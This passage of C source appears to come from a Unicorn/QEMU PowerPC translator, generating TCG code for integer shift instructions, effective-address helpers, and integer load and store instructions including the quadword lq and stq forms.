gen_set_Rc0(ctx, t_ra); } } GEN_PPC64_R4(rldimi, 0x1E, 0x06); #endif /*** Integer shift ***/ /* slw & slw. */ static void gen_slw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x20 */ #if defined(TARGET_PPC64) tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x3a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); #else tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x1f); #endif tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1f); tcg_gen_shl_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); tcg_gen_ext32u_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sraw & sraw. */ static void gen_sraw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_sraw(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srawi & srawi. */ static void gen_srawi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv dst = cpu_gpr[rA(ctx->opcode)]; TCGv src = cpu_gpr[rS(ctx->opcode)]; if (sh == 0) { tcg_gen_ext32s_tl(tcg_ctx, dst, src); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_movi_tl(tcg_ctx, cpu_ca32, 0); } } else { TCGv t0; tcg_gen_ext32s_tl(tcg_ctx, dst, src); tcg_gen_andi_tl(tcg_ctx, cpu_ca, dst, (1ULL << sh) - 1); t0 = tcg_temp_new(tcg_ctx); tcg_gen_sari_tl(tcg_ctx, t0, dst, TARGET_LONG_BITS - 1); tcg_gen_and_tl(tcg_ctx, cpu_ca, cpu_ca, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, cpu_ca, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ca32, cpu_ca); } tcg_gen_sari_tl(tcg_ctx, dst, dst, sh); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, dst); } } /* srw & srw. */ static void gen_srw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x20 */ #if defined(TARGET_PPC64) tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x3a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); #else tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1a); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x1f); #endif tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); tcg_gen_ext32u_tl(tcg_ctx, t0, t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1f); tcg_gen_shr_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } #if defined(TARGET_PPC64) /* sld & sld. */ static void gen_sld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x40 */ tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x39); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x3f); tcg_gen_shl_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srad & srad. */ static void gen_srad(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_srad(tcg_ctx, cpu_gpr[rA(ctx->opcode)], tcg_ctx->cpu_env, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sradi & sradi. */ static inline void gen_sradi(DisasContext *ctx, int n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode) + (n << 5); TCGv dst = cpu_gpr[rA(ctx->opcode)]; TCGv src = cpu_gpr[rS(ctx->opcode)]; if (sh == 0) { tcg_gen_mov_tl(tcg_ctx, dst, src); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_movi_tl(tcg_ctx, cpu_ca32, 0); } } else { TCGv t0; tcg_gen_andi_tl(tcg_ctx, cpu_ca, src, (1ULL << sh) - 1); t0 = tcg_temp_new(tcg_ctx); tcg_gen_sari_tl(tcg_ctx, t0, src, TARGET_LONG_BITS - 1); tcg_gen_and_tl(tcg_ctx, cpu_ca, cpu_ca, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_NE, cpu_ca, cpu_ca, 0); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ca32, cpu_ca); } tcg_gen_sari_tl(tcg_ctx, dst, src, sh); } if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, dst); } } static void gen_sradi0(DisasContext *ctx) { gen_sradi(ctx, 0); } static void gen_sradi1(DisasContext *ctx) { gen_sradi(ctx, 1); } /* extswsli & extswsli. */ static inline void gen_extswsli(DisasContext *ctx, int n) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode) + (n << 5); TCGv dst = cpu_gpr[rA(ctx->opcode)]; TCGv src = cpu_gpr[rS(ctx->opcode)]; tcg_gen_ext32s_tl(tcg_ctx, dst, src); tcg_gen_shli_tl(tcg_ctx, dst, dst, sh); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, dst); } } static void gen_extswsli0(DisasContext *ctx) { gen_extswsli(ctx, 0); } static void gen_extswsli1(DisasContext *ctx) { gen_extswsli(ctx, 1); } /* srd & srd. */ static void gen_srd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); /* AND rS with a mask that is 0 when rB >= 0x40 */ tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x39); tcg_gen_sari_tl(tcg_ctx, t0, t0, 0x3f); tcg_gen_andc_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x3f); tcg_gen_shr_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } #endif /*** Addressing modes ***/ /* Register indirect with immediate index : EA = (rA|0) + SIMM */ static inline void gen_addr_imm_index(DisasContext *ctx, TCGv EA, target_long maskl) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); simm &= ~maskl; if (rA(ctx->opcode) == 0) { if (NARROW_MODE(ctx)) { simm = (uint32_t)simm; } tcg_gen_movi_tl(tcg_ctx, EA, simm); } else if (likely(simm != 0)) { tcg_gen_addi_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)], simm); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, EA); } } else { if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } else { tcg_gen_mov_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } } } static inline void gen_addr_reg_index(DisasContext *ctx, TCGv EA) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rA(ctx->opcode) == 0) { if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, cpu_gpr[rB(ctx->opcode)]); } else { tcg_gen_mov_tl(tcg_ctx, EA, cpu_gpr[rB(ctx->opcode)]); } } else { tcg_gen_add_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, EA); } } } static inline void gen_addr_register(DisasContext *ctx, TCGv EA) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (rA(ctx->opcode) == 0) { tcg_gen_movi_tl(tcg_ctx, EA, 0); } else if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } else { tcg_gen_mov_tl(tcg_ctx, EA, cpu_gpr[rA(ctx->opcode)]); } } static inline void gen_addr_add(DisasContext *ctx, TCGv ret, TCGv arg1, target_long val) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_addi_tl(tcg_ctx, ret, arg1, val); if (NARROW_MODE(ctx)) { tcg_gen_ext32u_tl(tcg_ctx, ret, ret); } } static inline void gen_align_no_le(DisasContext *ctx) { gen_exception_err(ctx, POWERPC_EXCP_ALIGN, (ctx->opcode & 0x03FF0000) | POWERPC_EXCP_ALIGN_LE); } /*** Integer load ***/ #define DEF_MEMOP(op) ((op) | ctx->default_tcg_memop_mask) #define BSWAP_MEMOP(op) ((op) | (ctx->default_tcg_memop_mask ^ MO_BSWAP)) #define GEN_QEMU_LOAD_TL(ldop, op) \ static void glue(gen_qemu_, ldop)(DisasContext *ctx, \ TCGv val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_ld_tl(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_LOAD_TL(ld8u, DEF_MEMOP(MO_UB)) GEN_QEMU_LOAD_TL(ld16u, DEF_MEMOP(MO_UW)) GEN_QEMU_LOAD_TL(ld16s, DEF_MEMOP(MO_SW)) GEN_QEMU_LOAD_TL(ld32u, DEF_MEMOP(MO_UL)) GEN_QEMU_LOAD_TL(ld32s, DEF_MEMOP(MO_SL)) GEN_QEMU_LOAD_TL(ld16ur, BSWAP_MEMOP(MO_UW)) GEN_QEMU_LOAD_TL(ld32ur, BSWAP_MEMOP(MO_UL)) #define GEN_QEMU_LOAD_64(ldop, op) \ static void glue(gen_qemu_, glue(ldop, _i64))(DisasContext *ctx, \ TCGv_i64 val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_ld_i64(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_LOAD_64(ld8u, DEF_MEMOP(MO_UB)) GEN_QEMU_LOAD_64(ld16u, DEF_MEMOP(MO_UW)) GEN_QEMU_LOAD_64(ld32u, DEF_MEMOP(MO_UL)) GEN_QEMU_LOAD_64(ld32s, DEF_MEMOP(MO_SL)) GEN_QEMU_LOAD_64(ld64, DEF_MEMOP(MO_Q)) #if defined(TARGET_PPC64) GEN_QEMU_LOAD_64(ld64ur, BSWAP_MEMOP(MO_Q)) #endif #define GEN_QEMU_STORE_TL(stop, op) \ static void glue(gen_qemu_, stop)(DisasContext *ctx, \ TCGv val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_st_tl(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_STORE_TL(st8, DEF_MEMOP(MO_UB)) GEN_QEMU_STORE_TL(st16, DEF_MEMOP(MO_UW)) GEN_QEMU_STORE_TL(st32, DEF_MEMOP(MO_UL)) GEN_QEMU_STORE_TL(st16r, BSWAP_MEMOP(MO_UW)) GEN_QEMU_STORE_TL(st32r, BSWAP_MEMOP(MO_UL)) #define GEN_QEMU_STORE_64(stop, op) \ static void glue(gen_qemu_, glue(stop, _i64))(DisasContext *ctx, \ TCGv_i64 val, \ TCGv addr) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ tcg_gen_qemu_st_i64(tcg_ctx, val, addr, ctx->mem_idx, op); \ } GEN_QEMU_STORE_64(st8, DEF_MEMOP(MO_UB)) GEN_QEMU_STORE_64(st16, DEF_MEMOP(MO_UW)) GEN_QEMU_STORE_64(st32, DEF_MEMOP(MO_UL)) GEN_QEMU_STORE_64(st64, DEF_MEMOP(MO_Q)) #if defined(TARGET_PPC64) GEN_QEMU_STORE_64(st64r, BSWAP_MEMOP(MO_Q)) #endif #define GEN_LD(name, ldop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDU(name, ldop, opc, type) \ static void glue(gen_, name##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0 || \ rA(ctx->opcode) == rD(ctx->opcode))) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (type == PPC_64B) \ gen_addr_imm_index(ctx, EA, 0x03); \ else \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDUX(name, ldop, opc2, opc3, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0 || \ rA(ctx->opcode) == rD(ctx->opcode))) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDX_E(name, ldop, opc2, opc3, type, type2, chk) \ static void glue(gen_, name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ chk; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##ldop(ctx, cpu_gpr[rD(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_LDX(name, ldop, opc2, opc3, type) \ GEN_LDX_E(name, ldop, opc2, opc3, type, PPC_NONE, CHK_NONE) #define GEN_LDX_HVRM(name, ldop, opc2, opc3, type) \ GEN_LDX_E(name, ldop, opc2, opc3, type, PPC_NONE, CHK_HVRM) #define GEN_LDS(name, ldop, op, type) \ GEN_LD(name, ldop, op | 0x20, type); \ GEN_LDU(name, ldop, op | 0x21, type); \ GEN_LDUX(name, ldop, 0x17, op | 0x01, type); \ GEN_LDX(name, ldop, 0x17, op | 0x00, type) /* lbz lbzu lbzux lbzx */ GEN_LDS(lbz, ld8u, 0x02, PPC_INTEGER); /* lha lhau lhaux lhax */ GEN_LDS(lha, ld16s, 0x0A, PPC_INTEGER); /* lhz lhzu lhzux lhzx */ GEN_LDS(lhz, ld16u, 0x08, PPC_INTEGER); /* lwz lwzu lwzux lwzx */ GEN_LDS(lwz, ld32u, 0x00, PPC_INTEGER); #define GEN_LDEPX(name, ldop, opc2, opc3) \ static void glue(gen_, name##epx)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ CHK_SV; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ tcg_gen_qemu_ld_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], EA, PPC_TLB_EPID_LOAD, ldop);\ tcg_temp_free(tcg_ctx, EA); \ } GEN_LDEPX(lb, DEF_MEMOP(MO_UB), 0x1F, 0x02) GEN_LDEPX(lh, DEF_MEMOP(MO_UW), 0x1F, 0x08) GEN_LDEPX(lw, DEF_MEMOP(MO_UL), 0x1F, 0x00) #if defined(TARGET_PPC64) GEN_LDEPX(ld, DEF_MEMOP(MO_Q), 0x1D, 0x00) #endif #if defined(TARGET_PPC64) /* lwaux */ GEN_LDUX(lwa, ld32s, 0x15, 0x0B, PPC_64B); /* lwax */ GEN_LDX(lwa, ld32s, 0x15, 0x0A, PPC_64B); /* ldux */ GEN_LDUX(ld, ld64_i64, 0x15, 0x01, PPC_64B); /* ldx */ GEN_LDX(ld, ld64_i64, 0x15, 0x00, PPC_64B); /* CI load/store variants */ GEN_LDX_HVRM(ldcix, ld64_i64, 0x15, 0x1b, PPC_CILDST) GEN_LDX_HVRM(lwzcix, ld32u, 0x15, 0x15, PPC_CILDST) GEN_LDX_HVRM(lhzcix, ld16u, 0x15, 0x19, PPC_CILDST) GEN_LDX_HVRM(lbzcix, ld8u, 0x15, 0x1a, PPC_CILDST) static void gen_ld(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv EA; if (Rc(ctx->opcode)) { if (unlikely(rA(ctx->opcode) == 0 || rA(ctx->opcode) == rD(ctx->opcode))) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x03); if (ctx->opcode & 0x02) { /* lwa (lwau is undefined) */ gen_qemu_ld32s(ctx, cpu_gpr[rD(ctx->opcode)], EA); } else { /* ld - ldu */ gen_qemu_ld64_i64(ctx, cpu_gpr[rD(ctx->opcode)], EA); } if (Rc(ctx->opcode)) { tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); } tcg_temp_free(tcg_ctx, EA); } /* lq */ static void gen_lq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int ra, rd; TCGv EA, hi, lo; /* lq is a legal user mode instruction starting in ISA 2.07 */ bool legal_in_user_mode = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; bool le_is_supported = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; if (!legal_in_user_mode && ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; } if (!le_is_supported && ctx->le_mode) { gen_align_no_le(ctx); return; } ra = rA(ctx->opcode); rd = rD(ctx->opcode); if (unlikely((rd & 1) || rd == ra)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x0F); /* Note that the low part is always in RD+1, even in LE mode. */ lo = cpu_gpr[rd + 1]; hi = cpu_gpr[rd]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_ATOMIC128) { TCGv_i32 oi = tcg_temp_new_i32(tcg_ctx); if (ctx->le_mode) { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_LEQ, ctx->mem_idx)); gen_helper_lq_le_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } else { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_BEQ, ctx->mem_idx)); gen_helper_lq_be_parallel(tcg_ctx, lo, tcg_ctx->cpu_env, EA, oi); } tcg_temp_free_i32(tcg_ctx, oi); tcg_gen_ld_i64(tcg_ctx, hi, tcg_ctx->cpu_env, offsetof(CPUPPCState, retxh)); } else { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } } else if (ctx->le_mode) { tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_LEQ); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_LEQ); } else { tcg_gen_qemu_ld_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_BEQ); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_ld_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); } #endif /*** Integer store ***/ #define GEN_ST(name, stop, opc, type) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STU(name, stop, opc, type) \ static void glue(gen_, stop##u)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ if (type == PPC_64B) \ gen_addr_imm_index(ctx, EA, 0x03); \ else \ gen_addr_imm_index(ctx, EA, 0); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STUX(name, stop, opc2, opc3, type) \ static void glue(gen_, name##ux)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ if (unlikely(rA(ctx->opcode) == 0)) { \ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); \ return; \ } \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STX_E(name, stop, opc2, opc3, type, type2, chk) \ static void glue(gen_, name##x)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ chk; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ gen_qemu_##stop(ctx, cpu_gpr[rS(ctx->opcode)], EA); \ tcg_temp_free(tcg_ctx, EA); \ } #define GEN_STX(name, stop, opc2, opc3, type) \ GEN_STX_E(name, stop, opc2, opc3, type, PPC_NONE, CHK_NONE) #define GEN_STX_HVRM(name, stop, opc2, opc3, type) \ GEN_STX_E(name, stop, opc2, opc3, type, PPC_NONE, CHK_HVRM) #define GEN_STS(name, stop, op, type) \ GEN_ST(name, stop, op | 0x20, type); \ GEN_STU(name, stop, op | 0x21, type); \ GEN_STUX(name, stop, 0x17, op | 0x01, type); \ GEN_STX(name, stop, 0x17, op | 0x00, type) /* stb stbu stbux stbx */ GEN_STS(stb, st8, 0x06, PPC_INTEGER); /* sth sthu sthux sthx */ GEN_STS(sth, st16, 0x0C, PPC_INTEGER); /* stw stwu stwux stwx */ GEN_STS(stw, st32, 0x04, PPC_INTEGER); #define GEN_STEPX(name, stop, opc2, opc3) \ static void glue(gen_, name##epx)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv EA; \ CHK_SV; \ gen_set_access_type(ctx, ACCESS_INT); \ EA = tcg_temp_new(tcg_ctx); \ gen_addr_reg_index(ctx, EA); \ tcg_gen_qemu_st_tl(tcg_ctx, \ cpu_gpr[rD(ctx->opcode)], EA, PPC_TLB_EPID_STORE, stop); \ tcg_temp_free(tcg_ctx, EA); \ } GEN_STEPX(stb, DEF_MEMOP(MO_UB), 0x1F, 0x06) GEN_STEPX(sth, DEF_MEMOP(MO_UW), 0x1F, 0x0C) GEN_STEPX(stw, DEF_MEMOP(MO_UL), 0x1F, 0x04) #if defined(TARGET_PPC64) GEN_STEPX(std, DEF_MEMOP(MO_Q), 0x1d, 0x04) #endif #if defined(TARGET_PPC64) GEN_STUX(std, st64_i64, 0x15, 0x05, PPC_64B); GEN_STX(std, st64_i64, 0x15, 0x04, PPC_64B); GEN_STX_HVRM(stdcix, st64_i64, 0x15, 0x1f, PPC_CILDST) GEN_STX_HVRM(stwcix, st32, 0x15, 0x1c, PPC_CILDST) GEN_STX_HVRM(sthcix, st16, 0x15, 0x1d, PPC_CILDST) GEN_STX_HVRM(stbcix, st8, 0x15, 0x1e, PPC_CILDST) static void gen_std(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int rs; TCGv EA; rs = rS(ctx->opcode); if ((ctx->opcode & 0x3) == 0x2) { /* stq */ bool legal_in_user_mode = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; bool le_is_supported = (ctx->insns_flags2 & PPC2_LSQ_ISA207) != 0; TCGv hi, lo; if (!(ctx->insns_flags & PPC_64BX)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } if (!legal_in_user_mode && ctx->pr) { gen_priv_exception(ctx, POWERPC_EXCP_PRIV_OPC); return; } if (!le_is_supported && ctx->le_mode) { gen_align_no_le(ctx); return; } if (unlikely(rs & 1)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x03); /* Note that the low part is always in RS+1, even in LE mode. */ lo = cpu_gpr[rs + 1]; hi = cpu_gpr[rs]; if (tb_cflags(ctx->base.tb) & CF_PARALLEL) { if (HAVE_ATOMIC128) { TCGv_i32 oi = tcg_temp_new_i32(tcg_ctx); if (ctx->le_mode) { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_LEQ, ctx->mem_idx)); gen_helper_stq_le_parallel(tcg_ctx, tcg_ctx->cpu_env, EA, lo, hi, oi); } else { tcg_gen_movi_i32(tcg_ctx, oi, make_memop_idx(MO_BEQ, ctx->mem_idx)); gen_helper_stq_be_parallel(tcg_ctx, tcg_ctx->cpu_env, EA, lo, hi, oi); } tcg_temp_free_i32(tcg_ctx, oi); } else { /* Restart with exclusive lock. */ gen_helper_exit_atomic(tcg_ctx, tcg_ctx->cpu_env); ctx->base.is_jmp = DISAS_NORETURN; } } else if (ctx->le_mode) { tcg_gen_qemu_st_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_LEQ); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_LEQ); } else { tcg_gen_qemu_st_i64(tcg_ctx, hi, EA, ctx->mem_idx, MO_BEQ); gen_addr_add(ctx, EA, EA, 8); tcg_gen_qemu_st_i64(tcg_ctx, lo, EA, ctx->mem_idx, MO_BEQ); } tcg_temp_free(tcg_ctx, EA); } else { /* std / stdu */ if (Rc(ctx->opcode)) { if (unlikely(rA(ctx->opcode) == 0)) { gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); return; } } gen_set_access_type(ctx, ACCESS_INT); EA = tcg_temp_new(tcg_ctx); gen_addr_imm_index(ctx, EA, 0x03); gen_qemu_st64_i64(ctx, cpu_gpr[rs], EA); if (Rc(ctx->opcode)) { tcg_gen_mov_tl(tcg_ctx, 